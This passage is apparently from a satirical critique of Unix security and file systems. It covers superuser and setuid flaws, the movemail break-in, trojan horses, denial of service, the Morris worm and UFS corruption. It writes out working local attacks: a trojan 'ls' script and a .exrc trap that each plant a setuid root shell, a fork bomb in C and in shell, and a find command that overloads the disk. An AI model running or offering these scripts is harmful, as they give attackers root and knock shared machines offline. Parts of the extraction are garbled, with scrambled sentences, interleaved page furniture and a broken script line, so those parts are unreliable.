for controlling a line printer. Put another way. every piece of the operating system must be examined by itself and in concert with every other piece to ensure freedom from security violations. control the security configuration. modify any programs. The superuser may delete any file. all aspects of the computer’s operating system must be security aware. Security is not a line printer: for computer security to work. Unix stores security information about the computer inside the computer itself. Holes in the Armor Two fundamental design flaws prevent Unix from being secure. Second. which are edited with the standard Unix editor. Security is thus enforced by a combination of small programs— each of which allegedly do one function well—and a few tricks in the operating system’s kernel to enforce some sort of overall policy. every configuration file.
be able to wipe out every file on the system. Ordinary users can’t be allowed to directly modify /etc/passwd because then they could change each other's passwords. or setuid. it doesn’t just have permission to modify the file /etc/passwd: it has permission to modify any file. Unfortunately. if it can be convinced to create a subshell—then the attacking user can inherit these superuser privileges to control the system. SUID is a built-in security hole that provides a way for regular users to run commands that require special privileges to operate. . do anything it wants. The /bin/passwd program. this security audit procedure is rarely performed (most third-party software vendors. Most SUID programs are installed SUID root. That high school kid you’ve hired to do backups might accidentally (or intentionally) leave your system open to attack. When run. so they run with superuser privileges. the Unix program that lets users change their passwords. an SUID program assumes the privileges of the person who installed the program. while /bin/passwd is running as superuser. with no security checks). which is run by mere users. An administrator who can change people’s passwords must also. by design. Unix’s “Superuser” is all-or-nothing. Complex and useful programs need to create files or write in directories to which the user of the program does not have access. are unwilling to disclose their sourcecode to their customers. so these companies couldn’t even conduct an audit if they wanted). Many Unix programs and utilities require Superuser privileges. Unfortunately. programs that run as superuser must be carefully scrutinized to ensure that they exhibit no unintended side effects and have no holes that could be exploited to gain unauthorized superuser access. (After all. assumes superuser privileges when run and is constructed to change only the password of the user running it and nobody else’s. raises as many security problems as the superuser concept does. The designers of the Unix operating system would have us believe that SUID is a fundamental requirement of an advanced operating system. To ensure security.Holes in the Armor 245 Superuser: The Superflaw All multiuser operating systems need privileged accounts. it’s running as root. If it can be subverted while it is running—for example. The Problem with SUID The Unix concept called SUID. rather than the person who is running the program. The /bin/passwd program changes a user’s password by modifying the contents of the file /etc/passwd. The most common example given is /bin/passwd. Virtually all multiuser operating systems other than Unix apportion privilege according to need. indeed. for example.
Gretzinger (Project Athena) Added POP (Post Office Protocol) service. Stoll tells how a group of computer crackers in West Germany broke into numerous computers across the United States and Europe by exploiting a “bug” in an innocuous utility. as we’ll see later on. In order to make movemail work properly with POP. movemail simply moved incoming pieces of electronic mail from the user’s mailbox in /usr/spool/mail to the user’s home directory. You can even find Gretzinger’s note in the movemail source code: /* * * * * * * * Modified January. (The Unix-savvy reader might object to this attack.”) SUID isn’t limited to the superuser—any program can be made SUID. consider an example from Cliff Stoll’s excellent book The Cuckoo’s Egg. The intent was that SUID would simplify operating system design by obviating the need for a monolithic subsystem responsible for all aspects of system security. SUID gives the attacker a powerful way to break into otherwise “secure” systems: simply put a SUID root file on a floppy disk and mount it. . But then the program was modified in 1986 by Michael R. When compiled -DPOP movemail will accept input filename arguments of the form "po:username". so good: no problems here. Gretzinger wanted to use movemail to get his electronic mail from Athena’s electronic post office running POP (the Internet Post Office Protocol). When it was originally written. called movemail. So far. and any user can create an SUID program to assume that user’s privileges when it is run (without having to force anybody to type that user’s password). saying that mount is a privileged command that requires superuser privileges to run. SUID is a powerful tool for building traps that steal other users’ privileges. When combined with removable media (such as floppy disks or SyQuest drives). Movemail must be setuid to root in order to work with POP.246 Security AT&T was so pleased with the SUID concept that it patented it. Experience has shown that most of Unix's security flaws come from SUID programs. then run the SUID root program to become root. In practice. Unfortunately. Emacs. 1986 by Michael R. for a popular Unix editor. The Cuckoo’s Egg As an example of what can go wrong. This will cause movemail to open a connection to a pop server running on $MAILHOST (environment variable). Gretzinger found it necessary to install the program SUID root. many manufacturers now provide SUID programs for mounting removable media specifically to ameliorate this “inconvenience. Gretzinger at MIT’s Project Athena.
or if you run the wrong one by accident.W_OK)!=0) pfatal_with_name (outname). Seastrom <rs@ai. The problem is that movemail itself is 838 lines long—and movemail itself is a minuscule part of a program that is nearly 100.Holes in the Armor 247 * * . When they start acting up.. 22 Oct 89 01:17:19 EDT Robert E. it allowed the user whose mail was being moved to read or modify any file on the entire system. And when the program ran as root. It’s not a hard patch.domain > logfile & . but not to clean it up.F_OK)==0 && access(outname. This problem can be very annoying. */ if (access(outname. you are out of luck: Date: From: To: Subject: Sun.edu> UNIX-HATERS damn setuid Tonight I was collecting some info on echo times to a host that’s on the far side of a possibly flakey gateway. Stoll’s West German computer criminals used this bug to break into military computers all over the United States and Europe at the behest of their KGB controllers. */ There was just one problem: the original author of movemail had never suspected that the program would one day be running SUID root.mit. I say: % ping -t5000 -f 60 host. Here is the three-line patch that would have prevented this particular break-in: /* Check access to output file. How could anyone have audited that code before they installed it and detected this bug? The Other Problem with SUID SUID has another problem: it give users the power to make a mess.000 lines long. Since I have better things to do than sit around for half an hour while it pings said host every 5 seconds. But if you don’t have superuser privileges yourself. you need a way of killing it. Eventually the bug was fixed.. SUID programs are (usually) SUID to do something special that requires special privileges.
248 Security Now. Why did these network servers have the appropriate operating system permission to spawn subshells. when they never have to spawn a subshell in their normal course of operation? Because every Unix program has this ability. . what’s wrong with this? Ping. I’ll log out and then log back in again and it'll catch SIGHUP and die. then it’s yours and you can do whatever you bloody well please with it? Unix security tip of the day: You can greatly reduce your chances of breakin by crackers and infestation by viruses by logging in as root and typing: % rm /vmunix Processes Are Cheap—and Dangerous Another software tool for breaking Unix security are the systems calls fork() and exec(). is a setuid root program. Easily spawned subprocesses are a two-edged sword because a spawned subprogram can be a shell that lowers the drawbridge to let the Mongol hordes in. then its spawned process also runs as superuser. it turns out. When the spawning program is running as superuser. Programs spawning subprograms lie at the heart of Unix’s tool-based philosophy. The problem for the security-conscious is that these programs inherit the privileges of the programs that spawn them. which enable one program to spawn other programs. right?” Wrong. and now when I’m done with it I CAN’T KILL THE PROCESS BECAUSE UNIX SAYS IT’S NOT MINE TO KILL! So I think “No prob. Emacs and FTP run subprocesses to accomplish specific tasks such as listing files. the “Internet Worm” (discussed later in this chapter) broke into unsuspecting computers by running network servers and then convincing them to spawn subshells. there is no way to deny subshell-spawning privileges to a program (or a user. It’s still there and NOW I'M TRULY SCREWED BECAUSE I CAN'T EVEN TRY TO FG IT! So I have to run off and find someone with root privileges to kill it for me! Why can’t Unix figure out that if the ppid of a process is the pid of your shell. Indeed. for that matter). Many a cracker has gained entry through spawned superuser shells.
However. This version of ls puts a SUID shell program in the /tmp directory that inherits all of the administrator’s privileges when it runs. if your PATH environment is :/bin:/usr/bin:/etc:/usr/local/bin:. When he typed ls. At your leisure you’ll 1 Please. It is also a powerful technique for cracking security by leaving traps for other users. Remove this script. If your system operator is brain-dead. For example. Give it the privileges of the person invoking the ls command. /etc.”—the current directory—as the first element instructs Unix to search the current directory for commands before searching /bin. Although he’ll think you’re stupid. and / usr/local/bin directories. go to your system administrator and tell him that you are having difficulty finding a particular file in your home directory. he’s the dummy. To find the executable. but the specially created ls program in your home directory.Holes in the Armor 249 The Problem with PATH Unix has to locate the executable image that corresponds to a given command name.sh1 /etc/chmod 4755 /tmp/. Unix consults the user’s PATH variable for a list of directories to search. so good. and he doesn’t even know it. /usr/bin. then. Copy the shell program to /tmp. Unix will automatically search through the /bin. in that order. when you type snarf. don’t try this yourself! . /bin/rm \$0 exec /bin/ls \$1 \$2 \$3 \$ Now. he will type the following two lines on his terminal: % cd <your home directory> % ls Now you’ve got him. Run the real ls. So far. Doing so is an incredible convenience when developing new programs. PATH variables such as this are a common disaster: PATH=:. Just create a file1 called ls in your home directory that contains: #!/bin/sh /bin/cp /bin/sh /tmp/. for a program snarf. the ls program run isn’t /bin/ls.:/bin:/usr/bin:/usr/local/bin: Having “.sh1 Start a shell. Suppose you are a student at a nasty university that won’t let you have superuser privileges.
If he’s got access to a SUID root shell program (usually called doit).exrc with the following contents into a directory: !(cp /bin/sh /tmp/.s$$. .250 Security run the newly created /tmp/. An extremely well-known startup trap preys upon vi. vi searches for a file called .chmod 4755 /tmp/. use. or run any of his files without the formality of learning his password or logging in as him. Startup traps When a complicated Unix program starts up. and you’ll have an SUID shell waiting for you in /tmp. so do you. We’ll explain this concept with an example. and not some treacherous doppelganger? Such doppelgangers.s$$)& and then wait for an unsuspecting sysadmin to invoke vi from that directory. the vi startup file. presumably illegitimate. At startup. called “trojan horses. Want to steal a few privs? Put a file called .sh1 to read. it reads configuration files from either the user’s home directory and/or the current directory to set initial and default parameters that customize the program to the user’s specifications. she’ll see a flashing exclamation mark at the bottom of her screen for a brief instant. start up files can be created and left by other users to do their bidding on your behalf. fast screenoriented editor that’s preferred by many sysadmins. Consider the standard Unix login procedure: login: jrandom password: <type your “secret” password> When you type your password. how do you know that you are typing to the honest-to-goodness Unix /bin/login program. Therein lies the rub. rather than in their home directory. Trusted Path and Trojan Horses Standard Unix provides no trusted path to the operating system. just like the previous attack. When she does. in the current directory. Congratulations! The entire system is at your mercy. It’s too bad that vi can’t edit more than one file at a time.” are widely available on cracker bulletin boards. a simple.exrc. delete. which is why sysadmins frequently start up vi from their current directory. their sole purpose is to capture your username and password for later. Unfortunately.
which asks for your username. and /bin/login. in a local file. are no different from any other program. For the next six months. Once an attacker breaks into a Unix. They are just programs. Unix Security had a great fall. Couldn’t get Security back together again Re-securing a compromised Unix system is very difficult. Many system operators examine the modification dates of files to detect unauthorized modifications. or device has incorrectly set permission bits. but you have no way of verifying them. she edits the log files to erase any traces of her incursion. and his initial access hole was closed. The Unix file system is a mass of protections and permission bits. The attack was only discovered because the computer’s hard disk ran out of space after bloating with usernames and passwords. All the king’s horses. which asks for your password. yet it is theoretically impossible to obtain in most versions of Unix: /etc/getty. it’s often easier to reinstall the operating system from scratch. Intruders usually leave startup traps. whenever a user on that computer used telnet to connect to another computer at MIT. the Telnet program captured. . directory. it puts the security of the entire system at risk. the victim’s username and password on the remote computer. trap doors. After a security incident. but an attacker who has gained superuser capabilities can reprogram the system clock—they can even use the Unix functions specifically provided for changing file times. This is a double whammy that makes it relatively easy for an experienced cracker to break into most Unix systems. a computer at MIT in recent memory was compromised. Compromised Systems Usually Stay That Way Unix Security sat on a wall. or anywhere else on the Internet. But the system administrator (a Unix wizard) didn’t realize that the attacker had modified the computer’s /usr/ucb/telnet program. Attackers trivially hide their tracks. For example. If a single file. They happen to be programs that ask you for highly confidential and sensitive information to verify that you are who you claim to be.Holes in the Armor 251 A trusted path is a fundamental requirement for computer security. and trojan horses in their wake. And all the king’s men. rather than pick up the pieces. The attacker was eventually discovered.
2 We have no idea why Bell Laboratories decided to distribute crypt with the original Unix system. When somebody steals your Unix computer’s disk drive (or your backup tapes). Using crypt is like giving a person two aspirin for a heart attack. Cryptic Encryption Encryption is a vital part of computer security. either express or implied. (Think of this as a new definition for the slogan open systems. Crypt's encryption algorithm is incredibly weak—so weak that several years ago. thinking that you were expecting to use the “x” command (invoke the mini-screen editor) that is in other versions of ed. Sadly. so you shrug and return to work. it doesn’t matter how well users’ passwords have been chosen: the attacker merely hooks the disk up to another system. and all of your system’s files are open for perusal. using crypt is worse than using no encryption program at all. you don’t notice until it is too late. Unix offers no builtin system for automatically encrypting files stored on the hard disk. but after you hit carriage-return. a graduate student at the MIT Artificial Intelligence Laboratory wrote a program that automatically decrypts data files encrypted with crypt.) Most versions of Unix come with an encryption program called crypt. not realizing until you try to use the file again that it was written out encrypted—and that you have no chance of ever reproducing the random password you unknowningly entered by banging on the keyboard. But in many ways. I’ve seen people try for hours to bang the keyboard in the exact same way as the first time because that’s the only hope they have of getting their file back. 2 Paul Rubin writes: “This can save your ass if you accidentally use the “x” command (encrypt the file) that is in some versions of ed. You hit a bunch of keys at random to see why the system seems to have hung (you don’t realize that the system has turned off echo so that you can type your secret encryption key). as to the accuracy of the enclosed materials or as to their suitability for any particular purpose. after cracking the system. It doesn’t occur to these people that crypt is so easy to break.252 Security and. Of course. Bell Telephone Laboratories assumes no responsibility for their use by the recipient. the editor saves your work normally again. Accordingly.… Then much later you write out the file and exit. as evidenced by their uncharacteristic disclaimer in the program’s man page: BUGS: There is no warranty of merchantability nor any warranty of fitness for a particular purpose nor any other warranty. But we know that the program’s authors knew how weak and unreliable it actually was.” . makes it is relatively easy to create holes to allow future reentry.
“it must be because Unix was patched to make it so I can’t delete this critical system resource.” they think. Bell Laboratories assumes no obligation to furnish any assistance of any kind whatsoever. How are they to know that the directory contains a space at the end of its name. When you run des (the program). Computer crackers have hidden megabytes of information in unsuspecting user’s directories.login) by default from directory displays. or to furnish any additional information or documentation.” You can’t blame them because there is no mention of the “system” directory in the documentation: lots of things about Unix aren’t mentioned in the documentation.Holes in the Armor 253 Further. there is no way to verify that it hasn’t been modified to squirrel away your valuable encryption keys or isn’t e-mailing a copy of everything encrypted to a third party. The Problem with Hidden Files Unix’s ls program suppresses files whose names begin with a period (such as . which is why they can’t delete it? How are they to know that it contains legal briefs stolen from some AT&T computer in Walla Walla. Most trusting users (maybe those who have migrated from the Mac or from MS-Windows) who see a file in their home directory called system won’t think twice about it—especially if they can’t delete it by typing rm system. anyway? Security is the problem of the sysadmins. Using file names that contain spaces or control characters is another powerful technique for hiding files from unsuspecting users. Although DES (the algorithm) is reasonably secure. Washington? And why would they care. Unix has remarkably few built-in safeguards against denial- . Attackers exploit this “feature” to hide their system-breaking tools by giving them names that begin with a period. without necessarily gaining access to privileged information. since Unix provides no tools for having a program verify des’s authenticity before it executes. not them.cshrc and . des (the program) isn’t. “If you can’t delete it. Denial of Service A denial-of-service attack makes the computer unusable to others. Unlike other operating systems. Some recent versions of Unix contain a program called des that performs encryption using the National Security Agency’s Data Encryption Standard.
two processes create clones of themselves. it still doesn’t prevent the system from being rendered virtually unusable.) No one can even run the su command to become Superuser! (Again. you can bring it to a halt by compiling and running the following program: main() { while(1){ fork(). While this patch prevents the system user from being locked out of the system after the user launches a process attack. for a total of four processes. Next time. (To be fair. a single process creates a clone of itself. any Unix user can launch this attack.) And if you are using sh. 30 or 60 different processes are active. And best of all. You don’t even need a C compiler to launch this creative attack. each one continually calling the fork() system call. until the Unix system becomes incapable of creating any more processes.254 Security of-service attacks. some versions of Unix do have a per-user process limit. Just try this on for size: #!/bin/sh $0 & exec $0 Both these attacks are very elegant: once they are launched. At this point. only to receive an error message that no more processes can be created. The first time through the loop. be it a desktop PC or a Unix mainframe. If you have an account on a Unix computer. A millimoment later. Unix was created in a research environment in which it was more important to allow users to exploit the computer than to prevent them from impinging upon each other’s CPU time or file allocations. the only way to regain control of your Unix system is by pulling the plug because no one can run the ps command to obtain the process numbers of the offending processes! (There are no more processes left. thanks to the programmability of the Unix shell. That’s because Unix doesn’t have . This program is guaranteed to grind any Unix computer to a halt. no processes. eight processes are busy cloning themselves. and so on. you can’t even run the kill command. } } This program runs the fork() (the system call that spawns a new process) continually. because to run it you need to be able to create a new process.
I had to kill it. Almost immediately. like firemen who set fires during the slow season.Holes in the Armor 255 any per-user CPU time quotas. thanks to the design of the Unix network system. then issue some cryptic statement such as: “Sendmail ran away. Not exciting enough? Well. Things should be fine now. he’ll type some magic commands. Unix grinds to a halt. If the random data cause the remote sendmail program to crash and dump core. It’s easy: just start four or five find jobs streaming through the file system with the command: % repeat 4 find / -exec wc {} \. The only action that a hapless sysadmin can take is to kill the offending process and hope for better “luck” the next time. Disk Overload Another attack brings Unix to its knees without even using up the CPU. without even logging in. neat. he’s not. Users of the remote machine will experience a sudden. you think. Simply write a program to open 50 connections to the sendmail daemon on a remote computer and send random garbage down these pipes.” Sendmail ran away? He’s got to be kidding. you can paralyze any Unix computer on the network by remote control.) System Usage Is Not Monitored Ever have a Unix computer inexplicably slow down? You complain to the resident Unix guru (assuming you haven’t been jaded enough to accept this behavior). sometimes it launches one itself. Each find process reads the contents of every readable file on the file system. for no reason at all. which flushes all of the operating system’s disk buffers. those 50 processes from the attacking the user will quickly swamp the computer and stop all useful work on the system. Unix doesn’t always wait for an attack of the type described above. thanks to Unix’s primitive approach to disk and network activity. Sendmail is among the worst offenders: sometimes. the target machine will run even slower. a sendmail process will begin consuming large amounts of CPU time. It’s simple. Sadly. and there is no effective prophylactic against users who get their jollies in strange ways. With a per-user process limit set at 50. unexplained slowdown. though. .
Apollo/Domain. Morris’s worm attacked not by cunning. sendmail. it forced the computer to execute a series of commands that eventually created a subshell. All those computer science ‘researchers’ do in any case is write increasingly sophisticated screen-savers or read netnews.] Date: 11 Nov 88 15:27 GMT+0100 .mit. stealth. was distributed by Sun Microsystems and Digital Equipment Corporation with a special command called DEBUG. TOPS-20. or sleuth. It was a strictly and purely a Unix worm. Robert T. an electronic parasite (a “worm”) disabled thousands of workstations and super-minicomputers across the United States. 15 Nov 88 13:30 EST Richard Mlynarik <mly@ai. but it would not have created a securitybreaking subshell. If the finger server had been unable to spawn subshells. Morris’s program wasn’t an “Internet Worm. fingerd.edu> UNIX-HATERS The Chernobyl of operating systems [I bet more ‘valuable research time’ is being ‘lost’ by the randoms flaming about the sendmail worm than was ‘lost’ due to worm-invasion. A jury found him guilty of writing a computer program that would “attack” systems on the network and “steal” passwords. ITS. But the real criminal of the “Internet Worm” episode wasn’t Robert Morris. Date: From: To: Subject: Tue. Morris. or Genera. the Morris worm would have crashed the Finger program.256 Security The Worms Crawl In In November 1988. Any person connecting to a sendmail program over the network and issuing a DEBUG command could convince the sendmail program to spawn a subshell. News reports placed the blame for the so-called “Internet Worm” squarely on the shoulders of a single Cornell University graduate student. By sending bogus information to the finger server. The worm attacked through a wide-area computer network called the Internet. but years of neglect of computer security issues by authors and vendors of the Unix operating system. it left alone all Internet machines running VMS. Releasing the worm was something between a prank and a widescale experiment. One of the network programs. The Morris worm also exploited a bug in the finger program. but by exploiting two well-known bugs in the Unix operating system—bugs that inherently resulted from Unix’s very design.” After all.
FRG ...de> To: RISKS-LIST@KL.The Worms Crawl In 257 From: Klaus Brunnstein <brunnstein@rz. but the ‘Chernobyl of Computing’ is being programmed in economic applications if ill-advised customers follow the computer industry into insecure Unix-land. ‘eating’ time and intelligence during a 16-hour nightshift. To me as an educated physicist.SRI.uni-hamburg. Klaus Brunnstein University of Hamburg. but at the same time teaching some valuable lessons). and further distracting activities in follow-up discussions.informatik.. parallels show up to the discussions of the risks overseen by the community of nuclear physicist.random security stuff. In such a sense..COM Subject: UNIX InSecurity (beyond the Virus-Worm) [. the consequence of the Unix euphoria may damage enterprises and economies. I slightly revise Peter Neumann's analogy to the Three-Mile-Island and Chernobyl accidents: the advent of the Virus-Worm may be comparable to a mini Three-Mile Island accident (with large threat though limited damage).] While the Virus-Worm did evidently produce only limited damage (esp.dbp.
260 .
But the real faults of Unix file systems run far deeper than these two missing features. It’s like a cancer victim’s immune system enshrining the carcinoma cell as ideal because the body is so good at making them. . Indeed. For users. we wrote. after years of indoctrination and brainwashing. the the most obvious failing is that the file systems don’t have version numbers and Unix doesn’t have an “undelete” capability—two faults that combine like sodium and water in the hands of most users. New User” we started a list of what’s wrong with the Unix file systems. Way back in the chapter “Welcome. it’s not surprising that many of Unix’s fundamental faults lie with the file system as well. people now accept Unix’s flaws as desired features. With Unix. but of ideology. Seastrom The traditional Unix file system is a grotesque hack that.13 The File System Sure It Corrupts Your Files.” Thus. But Look How Fast It Is! Pretty daring of you to be storing important files on a Unix system. has been enshrined as a “standard” by virtue of its widespread use. over the years. —Robert E. The faults are not faults of execution. we often are told that “everything is a file.
262 The File System What’s a File System? A file system is the part of a computer’s operating system that manages file storage on mass-storage devices such as floppy disks and hard drives. practical improvements to the UFS. a “feature” often exploited for its applications to “security. the eldest half-sister. Foremost among these was symbolic links—entries in the file system that could point to other files. called the filename. Nevertheless. AT&T refused Berkeley’s new code. some “standard” Unix programs knew that filenames could be longer than 14 characters. much in the same way that a turtle is faster than a slug. The Berkeley Fast (and loose) File System (FFS) was a genetic makeover of UFS engineered at the University of California at Berkeley. others didn’t. Each piece of information has a name. Berkeley actually made a variety of legitimate. leading to two increasingly divergent file systems with a whole host of mutually incompatiable file semantics. It wasn’t fast. and a unique place (we hope) on the hard disk. But in a classic example of Not Invented Here.”' It also supports the reading and writing of a file’s blocks. the evil stepmother Unix has spawned not one. As a result.” Oh. was sired in the early 1970s by the original Unix team at Bell Labs. The seminal Unix File System (UFS). UFS also limited filenames to 14 characters in length. but it was faster than the UFS it replaced. FFS eliminated UFS’s infamous 14-character filename limit. Although conceptually a separable part of the operating system. Some knew that a “file” in the file . Its most salient feature was its freewheeling conventions for filenames: it imposed no restrictions on the characters in a filename other than disallowing the slash character (“/”) and the ASCII NUL. not two. devices. or whatnot. It introduced a variety of new and incompatible features. Berkeley’s “fixes” would have been great had they been back-propagated to Bell Labs. Most importantly. Throughout the 1980s. in practice. but four different file systems. Meet the Relatives In the past two decades. directories. These step-systems all behave slightly differently when running the same program under the same circumstances. nearly every operating system in use today comes with its own peculiar file system. filenames could contain a multitude of unprintable and (and untypable) characters. The file system’s duty is to translate names such as /etc/passwd into locations on the disk such as “block 32156 of hard disk #2.
A good file system imposes as little structure as needed or as much structure as is required on the data it contains. we hope). And while AFS is technically superior to NFS (perhaps because it is superior).” and you’ll get the idea (before you run out of disk space. is actually trying to sell the program. and you’ll quickly see the problems shared by all of the file systems described in this chapter. The Andrew File System (AFS). it will never gain widespread use in the Unix marketplace because NFS has already been adopted by everyone in town and has become an established standard. Others didn’t.” The (somewhat dubious) goal is for the files and file hierarchies on the server to appear more or less on the client in more or less the same way that they appear on the server.” With NFS. rather than requiring you to tailor your data and your programs to its peculiarities. Although Apollo Computers had a network file system that worked better than NFS several years before NFS was a commercial product. the youngest half-sister. AFS is difficult to install and requires reformatting the hard disk. NFS allegedly lets different networked Unix computers share files “transparently. instead of giving it away. when programmers actually tried to develop NFS servers and clients for operating systems other than Unix. Sun begat the Network File System NFS. AFS has too many Unix-isms to be operating system independent. one computer is designated as a “file server.” Only years later. NFS became the dominant standard because it was “operating system independent” and Sun promoted it as an “open standard.What’s a File System? 263 system might actually be a symbolic link.. Visualize a File System Take a few moments to imagine what features a good file system might provide to an operating system. Most didn’t. A good file system provides the user with byte-level granularity—it lets you open a file and read or write a single byte—but it also provides support 1 Try using cp -r to copy a directory with a symbolic link to “. is another network file system that is allegedly designed to be operating system independent.1 Some programs worked as expected. AFS’s two other problems are that it was developed by a university (making it suspect in the eyes of many Unix companies) and is being distributed by a third-party vendor who.” and another computer is called the “client. It fits itself to your needs. Developed at CMU (on Unix systems). so you can see that it will die a bitter also-ran. did they realize how operating system dependent and closed NFS actually is. .
so many individual reads or writes can be batched up and executed as one. .264 The File System for record-based operations: reading. so that the file can be read or updated without moving the disk drive’s head (a relatively time-consuming process). For example. Truly advanced file systems allow users to store comments with each file. Unix offers none of them. All of these features have been built and fielded in commercially offered operating systems. Lastly. UFS occupies the fifth ring of hell. most importantly. UFS: The Root of All Evil Call it what you will. or a graphical image. (This might be one of the reasons that most Unix database companies bypass the Unix file system entirely and implement their own. Advanced file systems exploit the features of modern hard disk drives and controllers. and so on. writing. an executable object-code segment. UFS’s quirks and misnomers are now so enshrined in the “good senses” of computer science that in order to criticize them. buried deep inside the Unix kernel. the file system should allow you to store a file “type” with each file. The file system should store the length of each record. since most disk drives can transfer up to 64K bytes in a single burst. it is first necessary to warp one’s mind to become fluent with their terminology. be it program code. They also have support for scatter/gather operations. or locking a database recordby-record. doesn’t alter the contents of files or corrupt information written with it is an advanced system. access control lists (the names of the individuals who are allowed to access the contents of the files and the rights of each user). Most files get stored within a single track. Written as a quick hack at Bell Labs over several months. At the very least. advanced file systems are designed to support network access. The type indicates what is stored inside the file. a mature file systems allows applications or users to store out-of-band information with each file. A network file system that can tolerate the crash of a file server or client and that. They’re built from the ground up with a network protocol that offers high performance and reliability.) More than simple database support. advanced file systems store files in contiguous blocks so they can be read and written in a single operation.
that means that they run out of disk blocks. Some two-bit moron whose office is three floors up is twiddling your bits. You copy data into a file. plays itself out on the disks of Unix’s file system because system administrators must choose before the system is running how to divide the disk into bad (inode) space and good (usable file) space. The result is too much allocated inode space. An inode may reside in more than one directory. its owner. when it was last accessed—everything. To ensure files are not lost or corrupted.UFS: The Root of All Evil 265 UFS lives in a strange world where the computer’s hard disk is divided into three different parts: inodes. which point to inodes. In practice. hard links are a debugging nightmare. Filenames are stored in a special filetype called directories. and the free list. Unix calls this a “hard link. in their continued propaganda to convince us Unix is “simple to use. yin and yang. (Of course. it’s a deliberate design decision. otherwise data can be lost if the computer crashes . The struggle between good and evil. Which other file? There’s no simple way to tell. except for the file’s name. when it was modified. the kernel needs to find a block B on the free list. that is. and then create a directory entry that points to the inode of the newly un-freed block. because the file is really hard linked with another file. So most people tend to err on the side of caution and over-allocate inode space. An oversight? No. The system cannot trade between good and evil as it runs.” simply make the default inode space very large. Unix needs this free list because there isn’t enough online storage space to track all the blocks that are free on the disk at any instant. but still have plenty of inodes left…) Unix manufacturers. group. but. Once this decision is made. when it was created. as we all know from our own lives. data blocks.” which is supposedly one of UFS’s big advantages: the ability to have a single file appear in two places. and all of a sudden—surprise—it gets changed. it is set in stone. UFS maintains a free list of doubly-linked data blocks not currently under use. thereby increasing the cost per useful megabyte. Inodes are pointers blocks on the disk. remove the block from the free list by fiddling with the pointers on the blocks in front of and behind B. But you can’t find him. it is very expensive to keep the free list consistent: to create a new file. too much or too little of either is not much fun. Unfortunately. In Unix’s case when the file system runs out of inodes it won’t put new files on the disk. the operations must be performed atomically and in order. even if there is plenty of room for them! This happens all the time when putting Unix File Systems onto floppy disks. which decreases the usable disk space. They store everything interesting about a file—its contents.
edu (Andy Glew)2 Subject: Fast Re-booting Newsgroups: comp. you’re fine. As a result. What about power failures and glitches? What about goonball technicians and other incompetent people unplugging the wrong server in the machine room? What about floods in the sewers of Chicago? Well. for a real-time OS. frequently it can’t. Usually fsck can recover the damage. (Interrupting these sorts of operations can be like interrupting John McEnroe during a serve: both yield startling and unpredictable results. The tool that tries to rebuild your file system from those wet noodles is fsck (pronounced “Fsick. It scans the entire file system looking for damage that a crashing Unix typically exacts on its disk. Sometimes it can’t. Here’s a message that was forwarded to UNIX-HATERS by MLY.) No matter! The people who designed the Unix File System didn’t think that the computer would crash very often. the hard disk is usually in an inconsistent state. As long as you don’t crash during one of these moments. it originally appeared on the Usenet Newsgroup comp. During this time. That included fsck’ing the disk. This DECstation 3100. (If you’ve been having intermittent hardware failures.crhc. SCSI termination problems. .) In any event. took 8:19 (eight minutes and nineteen seconds) to reboot after powercycle. 10. with 16MB of memory. fsck can take 5. and an approximately 300Mb local SCSI disk. and incomplete block transfers. Rather than taking the time to design UFS so that it would run fast and keep the disk consistent (it is possible to do this).266 The File System while the update is taking places. or 20 minutes to find out. They wanted <10. Orderly Unix shutdowns cause no problems.arch in July 1990: Date: 13 Jul 9016:58:55 GMT From: aglew@oberon. they designed it simply to run fast. you’re left with a wet pile of noodles where your file system used to be. Time measured from the time I flicked the switch to the time I could log in. Unix is literally holding your computer hostage.uiuc.arch A few years ago a customer gave us a <30 second boot after power cycle requirement.”) the file system consistency checker. 2 Forwarded to UNIX-HATERS by Richard Mlynarik.
Journaling is in USL’s new Veritas file system. roll-back. IBM built this technology into its Journaling File System (first present in AIX V 3 on the RS/6000 workstation). After all. it’s nonstandard. Automatic File Corruption Sometimes fsck can’t quite put your file system back together. Modern file systems use journaling. and other sorts of file operations invented for large-scale databases to ensure that the information stored on the computer’s hard disk is consistent at all times—just in case the power should fail at an inopportune moment. Will journaling become prevalent in the Unix world at large? Probably not. The following is typical: .UFS: The Root of All Evil 267 That may be good by Unix standards. but it’s not great.
the problem was not entirely consistent and there were some files that did not appear to be associated with the owner or the filename.mit. motor-control. 29 May 91 00:42:20 EDT curt@ai. Please talk to him if you lost data.1 bmh user 9873 May 28 18:03 kchang but the contents of the file ‘named’ kchang was really that of the user bmh. Several mailboxes were deleted while attempting to reboot. (A number of people have complained about the fact that they could not seem to read their mailboxes. For example.mit. I left the file in /com/mail/strange-sam. Please feel free to talk to me if you wish clarification on this problem. Life crashed and the partition containing /com/mail failed the file-system check. etc. whitaker-users. Please take a moment to attempt to check your mailbox. At first it seemed that the ownership of a subset of the mailboxes had been changed. but it later became clear that. Unfortunately.edu (Curtis Fennell)3 Mixed up mail all-ai@ai.edu Life4 had. the following problem occurred: -rw------. Note that I associated ownerships by using the file ownerships and grep'ing for the “TO:” header line for confirmation. I did not grovel through the contents of private mailboxes. for the most part. I was unable to assign a file named ‘sam. Jonathan has a list of the deleted files. I have straightened this out as best I could and reassigned ownerships. Soon after starting to work on this problem. Below I include a list of the 60 users whose mailboxes are most likely to be at risk. 3 4 Forwarded to UNIX-HATERS by Gail Zacharias “Life” is the host name of the NFS and mail server at the MIT AI Laboratory. The user receives mail sent to bizzi. . what appears to be. This should be fixed). the ownership was correct but the name of the file was wrong.268 The File System Date: From: Subject: To: Wed. cbip-meet. hardware problems that caused a number of users’ mailboxes to be misassigned.’ It ought to have belonged to sae but I think I have correctly associated the real mailbox with that user.
